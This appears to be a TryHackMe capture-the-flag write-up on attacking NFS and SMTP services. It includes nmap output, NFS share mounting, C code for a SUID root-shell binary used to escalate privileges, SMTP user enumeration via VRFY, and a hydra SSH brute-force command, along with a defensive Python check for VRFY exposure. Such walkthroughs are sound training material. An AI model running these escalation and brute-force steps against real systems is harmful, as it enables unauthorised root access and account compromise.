https://tryhackme.com/room/networkservices2

Task 3 - Enumerating NFS

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 73:92:8e:04:de:40:fb:9c:90:f9:cf:42:70:c8:45:a7 (RSA)
|   256 6d:63:d6:b8:0a:67:fd:86:f1:22:30:2b:2d:27:1e:ff (ECDSA)
|_  256 bd:08:97:79:63:0f:80:7c:7f:e8:50:dc:59:cf:39:5e (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34399/tcp6  mountd
|   100005  1,2,3      48611/udp6  mountd
|   100005  1,2,3      54585/tcp   mountd
|   100005  1,2,3      59496/udp   mountd
|   100021  1,3,4      43281/tcp   nlockmgr
|   100021  1,3,4      46247/tcp6  nlockmgr
|   100021  1,3,4      56258/udp   nlockmgr
|   100021  1,3,4      57958/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
35359/tcp open  mountd   1-3 (RPC #100005)
43281/tcp open  nlockmgr 1-4 (RPC #100021)
45589/tcp open  mountd   1-3 (RPC #100005)
54585/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 111 (rpcbind) and port 2049 (NFS) are the interesting ports for us. List the NFS shares:

showmount -e <IP>

Mount the NFS share on the local machine (the mount point must exist first):

mkdir -p /tmp/mount
sudo mount -t nfs -o nolock <IP>:<share> /tmp/mount

Task 4 - Exploiting NFS (PrivEsc)

We will use the following C code. Compile it and name the output bash with gcc code.c -o bash. Do not forget that the code must be compiled as root, which means switching to root with sudo su first.

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */

int main()
{
   setgid(0);   /* switch to group root */
   setuid(0);   /* switch to user root; succeeds because the binary is SUID root */
   system("/bin/bash");
   return 0;
}

Set the SUID bit using chmod:

sudo chmod +s bash

Task 6 & 7 - SMTP

SMTP listens on port 25 by default.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:a7:03:13:39:08:5a:07:80:1a:e5:27:ee:9b:22:5d (RSA)
|   256 89:d0:40:92:15:09:39:70:17:6e:c5:de:5b:59:ee:cb (ECDSA)
|_  256 56:7c:d0:c4:95:2b:77:dd:53:d6:e6:73:99:24:f6:86 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: polosmtp.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=polosmtp
| Subject Alternative Name: DNS:polosmtp
| Not valid before: 2020-04-22T18:38:06
|_Not valid after:  2030-04-20T18:38:06
Service Info: Host:  polosmtp.home; OS: Linux; CPE: cpe:/o:linux:linux_kernel

To enumerate usernames, first install smtp-user-enum:

sudo apt install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 10.10.1.29
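As an added example (not part of the room or this writeup), a small Python script that parses the smtp-commands advertisement from the scan above for enumeration-friendly extensions, classifies the Postfix VRFY reply codes that smtp-user-enum relies on, and shows the main.cf setting that closes the gap. The reply lines are constructed samples.

```python
"""Check an SMTP EHLO/smtp-commands advertisement for VRFY exposure and
classify Postfix VRFY replies. Added example; sample data is constructed."""
import re

# Postfix VRFY replies with the default disable_vrfy_command = no (exposed)
# and with disable_vrfy_command = yes (hardened).
REPLY_CLASSES = {
    "252": "exists",    # 252 2.0.0 <user>            : local user accepted
    "550": "unknown",   # 550 5.1.1 ... User unknown in local recipient table
    "502": "disabled",  # 502 5.5.1 VRFY command is disabled
}

# Copy of the nmap smtp-commands line from the scan above (constructed).
SMTP_COMMANDS = ("polosmtp.home, PIPELINING, SIZE 10240000, VRFY, ETRN, "
                 "STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8")

# Extensions that let an unauthenticated client test whether a user exists.
LEAKY_EXTENSIONS = {"VRFY", "EXPN"}

# Postfix main.cf fragments: the exposed default beside the corrected setting.
WEAK_MAIN_CF = "disable_vrfy_command = no"
FIXED_MAIN_CF = "disable_vrfy_command = yes"


def parse_ehlo_keywords(line: str) -> set:
    """Return EHLO keywords (first token of each item; the hostname is dropped)."""
    items = [item.strip() for item in line.split(",")]
    return {item.split()[0].upper() for item in items[1:] if item}


def vrfy_exposure(line: str) -> dict:
    """Report which enumeration-friendly extensions the server advertises."""
    kws = parse_ehlo_keywords(line)
    leaky = sorted(kws & LEAKY_EXTENSIONS)
    return {"leaky": leaky, "starttls": "STARTTLS" in kws, "hardened": not leaky}


def classify_vrfy_reply(reply: str) -> str:
    """Map a VRFY reply line to exists/unknown/disabled/other by status code."""
    m = re.match(r"^(\d{3})[ -]", reply)
    return REPLY_CLASSES.get(m.group(1), "other") if m else "other"


if __name__ == "__main__":
    print(vrfy_exposure(SMTP_COMMANDS), "fix:", FIXED_MAIN_CF)
    for r in ("252 2.0.0 administrator",
              "550 5.1.1 <bob>: Recipient address rejected: User unknown",
              "502 5.5.1 VRFY command is disabled"):
        print(r[:3], "->", classify_vrfy_reply(r))
```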

After finding a valid username, use hydra to brute-force the SSH login:

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.1.29 ssh -t 64